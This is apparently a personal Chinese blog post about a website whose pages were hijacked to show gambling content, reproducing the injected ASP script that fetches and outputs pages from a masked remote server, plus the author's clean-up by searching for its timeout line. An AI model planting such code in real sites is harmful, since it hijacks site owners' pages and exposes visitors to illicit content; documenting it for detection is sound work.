网站域名被劫持

网站域名被劫持是一件很讨厌的事情 ，尤其是被导向不良网站，如赌博等，很容易就被搜索引擎K了，我的站也有这种情况：

后来发现很多文件被改成了如下：

<%

server.Scripttimeout=999999

Remote_server="http://********/suer9291qcxtr.php"  //这里就是被跳转的网址

host_name="http://"&request.servervariables("HTTP_HOST")&request.servervariables("script_name")

Remote_file = Remote_server&"?host="&host_name

Content_mb=GetHtml(Remote_file)

response.write(Content_mb)

response.end()

Function GetHtml(url)

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0"

ObjXMLHTTP.send

GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write GetHtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

GetHtml = objStream.ReadText

objStream.Close

End Function

%>

先记录一下，去清理网站了

因发现这些文件内容不同但里面都设置了server.Scripttimeout=999999，就下了notepad++,遍历了一遍网站

基本能找出来，不过忘了颜色号999999的也很多，选择性的清理了。